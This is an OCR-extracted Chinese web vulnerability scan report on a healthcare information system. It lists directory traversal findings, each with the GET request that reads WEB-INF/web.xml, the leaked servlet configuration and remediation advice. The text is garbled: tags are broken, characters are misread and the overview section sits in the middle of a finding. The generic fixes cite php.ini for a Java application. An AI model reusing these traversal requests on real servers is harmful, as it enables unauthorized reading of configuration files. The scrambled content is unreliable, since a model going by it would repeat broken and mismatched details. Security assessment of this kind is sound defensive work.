基層醫(yī)療衛(wèi)生信息系統(tǒng) (3)
http:/10.8.3.187:9001/phis/web應(yīng)用安全檢測(cè)報(bào)告TideSec安全團(tuán)隊(duì)2020年08月12日<servlet-name>rpcServer</servlet-name<servlet-class>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name><url-pattern>/rpc/*/url-pattern></servlet-mapping<!一 <servlet><servlet-name>AuthorizationServlet</servletname><servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servletname><servletclass>ctd.oauth. AuthLogon</servlet-class></servlet>servlet-mappingsservlet-name>AuthorizationServlet</servlet-name><urlpattern>/oauth/authorize</url-pattern></serv1e t-mapp i ngs ><servlet-mappings><servlet-name>AuthLogon</servletname><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings -><servlet><servlet-name>HttpForward</servletname><servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servletmapping><servlet-name>HttpForward</servletname><url-pattern>/forward/*/url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/phis/css/images/./././WEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾(點(diǎn))等可能的惡意字符:這個(gè)試用于能夠修改線(xiàn)上代碼,最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式,看輸入的格式是否合法:這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致,但是有很大難度,需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir:這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄,作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.4目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞,允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/sencha/ext3/css風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName/./././WEB-INF/web.xml?.Original directory: /phis/resources/sencha/ext3/cssDirectory traversal pattern found:<webapp xmlns=z,http: /java. sun. com/xml/ns/javaee/zxmlns: xsi=/,http:/www. w3. org/2001/XMLSchema-instancez,xsi: schemaLocation=z/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp_2_5.xsdversion二2. 5><context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value></context-param><context-param>param-name1og4jConfigLocati on</param-name><paramvalue>classpath:phis/spring/log4j. properties</param-value></context-param><context-param><param-name>log4jRefreshInterval</param-name><param-value>6000</param-value></context-param><listener><listenerclass>org. springframework, web. util. Log4jConfigListener</listener-class</listener><listener><listener-class>ctd.mvc.controller, util. MVCSessionListener</listenerclass></listener><servlet><servlet-name>springServlet</servlet-name ><servletclass>org. springframework, web. servlet. DispatcherServlet</servlet-class><init-param><param-name>contextConfigLocation</param-name><param-value>classpath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一一></param-value></init-param>load-on-startup1/load-on-startup</servlet><servlet-mapping><servlet-name>springServlet</servlet-name ><url-pattern>/</url-pattern></servlet-mapping<servlet><servlet-name>rpcServer</servlet-name<servletclass>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><paramvalue>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servletmapping><servlet-name>rpcServer</servlet-name<url-pattern>/rpc/*</url-pattern></servlet-mapping<!一一 <servlet><servletname>AuthorizationServlet</servlet-name<servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servletname><servlet-class>ctd. oauth. AuthLogon</servlet-class></servlet><servlet-mappings><servletname>AuthorizationServlet</servletname><url-pattern>/oauth/authorize</url-pattern></servlet-mappings>servlet-mappings<servlet-name>AuthLogon</servlet-name><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings 一><servlet><servlet-name>HttpForward</servletname>servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servlet-mapping><servlet-name>HttpForward</servlet-name<url-pattern>/forward/*</url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/sencha/ext3/css/./././WEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾.(點(diǎn))等可能的惡意字符:這個(gè)試用于能夠修改線(xiàn)上代碼,最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式,看輸入的格式是否合法:這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致,但是有很大難度,需要大量時(shí)間配置規(guī)則。php.ini配置open basedir:這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄,作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.5目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞,允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/app風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName)/./WEB-INF/web.xml?.Original directory: /phis/resources/appDirectory traversal pattern found:<webapp xmlns=z/http: /java. sun. com/xml/ns/javaeez/xmlns: xsi=http:/www w3. org/2001/XMLSchema-instance/zxsi : schemaLocation=z/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/web-app_2_5. xsdversion=2. 5><context-param><param-name>webAppRootKey</param-nanie><param-value>phis. root</param-value></context-param><context-param><param-name>log4jConfigLocation</param-name><param-value>classpath:phis/spring/log4j. properties</param-value></context-param>contextparam<param-name>log4jRefreshInterval</parani-name><param-value>6000</param-value</context-param><listener><listener-class>org. springframework, web. util. Log4jConfigListener</listener-class></listener><listener><listenerclass>ctd.mvc.controller, util. MVCSessionListener</listener-class></listener><servlet><servlet-name>springServlet</servlet-name><servletclass>org. springframework, web. servlet. DispatcherServlet</servlet-class<init-param><paramname>contextConfigLocation</param-name>param-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一>/param-value</init-param><load-on-startup>l</load-on-startup></servlet>servlet-mapping<servlet-name>springServlet</servlet-name><url-pattern>/</url-pattern></serv1e t-mapp i ng><servlet><servlet-name>rpcServer</servlet-name<servletclass>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name><url-pattern>/rpc/*/urlpattern></servlet-mapping<!一 <servlet><servletname>AuthorizationServlet</servlet-name><servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servlet-name>servlet-class>ctd. oauth. AuthLogon</servlet-class></servlet><servletmappings><servlet-name>AuthorizationServlet</servlet-name<urlpattern>/oauth/authorize</url-pattern></servlet-mappingsservlet-mappings<servlet-name>AuthLogon</servlet-name><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings 一><servlet><servlet-name>HttpForward</servlet-name<servletclass>phis. source, controller. HttpControllerForward</servlet-class</servlet><servlet-mapping><servlet-name>HttpForward</servletname><url-pattern>/forwardA</url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/app/.AVEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾(點(diǎn))等可能的惡意字符:這個(gè)試用于能夠修改線(xiàn)上代碼,最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式,看輸入的格式是否合法:這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致,但是有很大難度,需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir:這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄,作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.6目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞,允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/element風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $(dirName/./WEB-INF/web.xml?.Original directory: /phis/resources/elementDirectory traversal pattern found:<webapp xmlns=/,http: /java. sun. com/xml/ns/javaee,zxmlns:xsi=http:/www. w3. org/2001/XMLSchema一instance”xsi : schemaLocation=/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp_2_5. xsdversion=2. 5><context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value</context-param><context-param>param-name1og4jConfigLocati on</param-name ><paramvalue>classpath:phis/spring/log4j. properties</param-value></context-param<context-param><param-name>log4jRefreshInterval</param-name><param-value>6000</param-value></context-param><listener><listenerclass>org.springframework, web. util. Log4jConfigListener</listenerclass></listener><listener><listener-class>ctd.mvc.controller, util. MVCSessionListener</listenerclass></listener><servlet><servlet-name>springServlet</servlet-name >servlet-class>org. springframework, web. servlet. DispatcherServlet</servlet-class><init-param><param-name>contextConfigLocation</param-name>param-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring. xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一一></param-value></init-param>1. 評(píng)估綜述本次評(píng)估對(duì)象為:網(wǎng)站URL: http:/10. 8. 3. 187:9001/phis/網(wǎng)站標(biāo)題:基層醫(yī)療衛(wèi)生信息系統(tǒng)IP地址:ErrorWEB安全掃描結(jié)果:高危漏洞:18個(gè)中危漏洞:6個(gè)低危漏洞:0個(gè)頁(yè)面安全檢測(cè)結(jié)果:URL總數(shù):52動(dòng)態(tài)URL: 1暗鏈頁(yè)面: 敏感字頁(yè)面:壞鏈頁(yè)面:快照頁(yè)面:信息泄露測(cè)試結(jié)果:開(kāi)放端口: Error個(gè)子域名:1個(gè)敏感信息:02. WDScanner簡(jiǎn)介近幾年,隨著互聯(lián)網(wǎng)各種安全漏洞愈演愈烈,OPENSSL心臟滴血漏洞、JAVA反序列化漏洞、STRUTS命令執(zhí)行漏洞、ImageMagick命令執(zhí)行漏洞等高危漏洞頻繁爆發(fā)。在這種情況下,為了能在漏洞爆發(fā)后快速形成漏洞檢測(cè)能力,同時(shí)能對(duì)網(wǎng)站或主機(jī)進(jìn)行全面快速的安全檢測(cè),TideSec安全團(tuán)隊(duì)開(kāi)發(fā)了分布式web安全監(jiān)測(cè)平臺(tái)WDScanneroWDScanner平臺(tái)主要包括如下功能:分布式web漏洞掃描、客戶(hù)管理、漏洞定期掃描、網(wǎng)站爬蟲(chóng)、暗鏈檢測(cè)、網(wǎng)站指紋識(shí)別、漏洞定向檢測(cè)、代理搜集及部署、密碼定向破解、社工庫(kù)查詢(xún)等功能。<load-on-startup>l</load-on-startup></servlet><servlet-mapping><servlet-name>springServlet</servlet-name ><url-pattern>/</url-pattern></servlet-mapping<servlet><servlet-name>rpcServer</servletname><servletclass>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><paramvalue>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servletmapping><servlet-name>rpcServer</servlet-name><urlpattern>/rpc/*/url-pattern></servlet-mapping><!一一 <servlet>servlet-name>AuthorizationServlet</servlet-name><servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servlet-name><servlet-class>ctd.oauth. AuthLogon</servlet-class></servlet>servlet-mappings<servletname>AuthorizationServlet</servletname><urlpattern>/oauth/authorize</url-pattern></servlet-mappings>servlet-mappings<servlet-name>AuthLogon</servlet-name<url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings 一><servlet><servlet-name>HttpForward</servletname>servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servlet-mapping><servlet-name>HttpForward</servlet-name<url-pattern>/forward/*</url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/element/./WEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾.(點(diǎn))等可能的惡意字符:這個(gè)試用于能夠修改線(xiàn)上代碼,最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式,看輸入的格式是否合法:這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致,但是有很大難度,需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir:這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄,作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.7目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞,允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/phis風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName/./WEB-INF/web.xml?.Original directory: /phis/resources/phisDirectory traversal pattern found:<webapp xmlns=/http: /java. sun. com/xml/ns/javaee,/xmlns:xsi=http:/www. w3. org/2001/XMLSchemainstance”xsi:schemaLocation二http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp 2 5.xsdversion2. 5><context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value></context-param><context-param><param-name>log4jConfigLocation</param-name ><paramvalue>classpath:phis/spring/log4j. properties</param-value></context-param><context-param><param-name>log4jRefreshInterval</param-name><param-value>6000</param-value</context-param><listener><listenerclass>org. springframework, web. util. Log4jConfigListener</listener-class</listener><listener><listener-class>ctd.mvc. controller, util. MVCSessionListener</listenerclass</listener><servlet><servlet-name>springServlet</servlet-name ><servlet-class>org. springframework, web. servlet. DispatcherServlet</servlet-class><init-param><paramname>contextConfigLocation</param-name><param-value>classpath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring, xml<! classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一>/param-value</init-param><load-on-startup>l</load-on-startup></servlet><serv1et-mapping><servlet-name>springServlet</servlet-name><url-pattern>/</url-pattern></serv1et-mapp i ng><servlet><servlet-name>rpcServer</servlet-name><servlet-class>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name>param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name<url-pattern>/rpc/*/urlpattern></servlet-mapping<!一一 <servlet><servlet-name>AuthorizationServlet</servlet-name<servletclass>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servlet-name><servletclass>ctd. oauth. AuthLogon</servletclass></servlet>servlet-mappingsservlet-name>AuthorizationServlet</servletname><url-pattern>/oauth/authorize</url-pattern></servlet-mappings><servlet-mappings><servlet-name>AuthLogon</servlet-name><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings -><servlet><servlet-name>HttpForward</servlet-name<servletclass>phis. source, controller. HttpControllerForward</servletclass></servlet><serv1et-mapping><servlet-name>HttpForward</servlet-name<url-pattern>/forward/*/url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/phis/./WEB-INF/web.xml? HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾.(點(diǎn))等可能的惡意字符:這個(gè)試用于能夠修改線(xiàn)上代碼,最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式,看輸入的格式是否合法:這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致,但是有很大難度,需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir:這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄,作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.8目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞,允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources/app/desktop風(fēng)險(xiǎn)參數(shù)This file was found using the pattern $dirName)/././WEB-INF/web.xml?.Original directory: /phis/resources/app/desktopDirectory traversal pattern found:<webapp xmlns=z,http: /java. sun. com/xml/ns/javaee/zxmlns:xsi=,http:/www. w3. org/2001/XMLSchemainstance”xsi: schemaLocation=,/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/webapp_2_5.xsdversion2. 5>測(cè)試詳情<context-param><param-name>webAppRootKey</param-name><param-value>phis. root</param-value></context-param><context-param><param-name>log4jConfigLocati on</param-name ><param-value>classpath:phis/spring/log4j. properties</param-value></context-param><context-param><param-name>log4jRefreshInterval</parani-name><param-value>6000</param-value</context-param><listener><listenerclass>org. springframework, web. util. Log4jConfigListener</listener-class</listener><listener><listenerclass>ctd.mvc.controller, util. MVCSessionListener</listenerclass></listener><servlet><servlet-name>springServlet</servlet-name ><servlet-class>org. springframework, web. servlet. DispatcherServlet</servlet-class<initparam><param-name>contextConfigLocation</param-name>param-valueclasspath:ctd/mvc/controller/spring-mvc. xmlclasspath:phis/spring/spring. xml<! -classpath:ctd/net/rpc/subscribe/store/spring-metaq. xml 一一>/param-value</init-param><load-on-startup>l</load-on-startup></servlet><servlet-mapping><servlet-name>springServlet</servlet-name ><url-pattern>/</url-pattern></servlet-mapping<servlet><servlet-name>rpcServer</servlet-name<servlet-class>com. caucho. hessian, server. HessianServlet</servlet-class><init-param><param-name>home-class</param-name><param-value>ctd. net. rpc. server. HessianServiceDispather</param-value></init-param></servlet><servlet-mapping><servlet-name>rpcServer</servlet-name><url-pattern>/rpc/*/url-pattern></servlet-mapping<!一 <servlet><servlet-name>AuthorizationServlet</servletname><servlet-class>ctd. oauth. AuthorizationCostom</servlet-class></servlet><servlet><servlet-name>AuthLogon</servletname><servletclass>ctd. oauth. AuthLogon</servlet-class></servlet>servlet-mappingsservlet-name>AuthorizationServlet</servlet-name><urlpattern>/oauth/authorize</url-pattern></serv1e t-mapp i ngs ><servlet-mappings><servlet-name>AuthLogon</servletname><url-pattern>/oauth/authorize_logon</url-pattern>/servlet-mappings -><servlet><servlet-name>HttpForward</servletname><servlet-class>phis. source, controller. HttpControllerForward</servlet-class</servlet><servletmapping><servlet-name>HttpForward</servletname><url-pattern>/forward/*/url-pattern></servlet-mapping</webapp>HTTP請(qǐng)求GET /phis/resources/app/desktop/./.AVEB-INF/web.xml?HTTP/1.1Host: 10.8.3.187:9001Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0Safari/537.21Accept: */*加固建議過(guò)濾(點(diǎn))等可能的惡意字符:這個(gè)試用于能夠修改線(xiàn)上代碼,最為推薦的方法正則判斷用戶(hù)輸入的參數(shù)的格式,看輸入的格式是否合法:這個(gè)方法的匹配最為準(zhǔn)確和細(xì)致,但是有很大難度,需要大量時(shí)間配置規(guī)則。php.ini配置open_basedir:這個(gè)參數(shù)值得的是用戶(hù)只能訪(fǎng)問(wèn)的目錄,作為不能修改線(xiàn)上代碼時(shí)的備用方案。4.9目錄遍歷漏洞漏洞描述此腳本可能容易受到目錄遍歷攻擊.Directory Traversal是一個(gè)漏洞,允許攻擊者訪(fǎng)問(wèn)受限目錄并在Web服務(wù)器的根目錄之外執(zhí)行命令。風(fēng)險(xiǎn)等級(jí)高危文件路徑/phis/resources風(fēng)險(xiǎn)參數(shù)測(cè)試詳情T(mén)his file was found using the pattern $dirName/./WEB-INF/web.xml?.Original directory: /phis/resourcesDirectory traversal pattern found:<webapp xmlns=z,http: /java. sun. com/xml/ns/javaee/zxmlns: xsi=/,http:/www. w3. org/2001/XMLSchema-instancez,xsi: schemaLocation=z/http:/java. sun. com/xml/ns/javaeehttp:/java. sun. com/xml/ns/javaee/we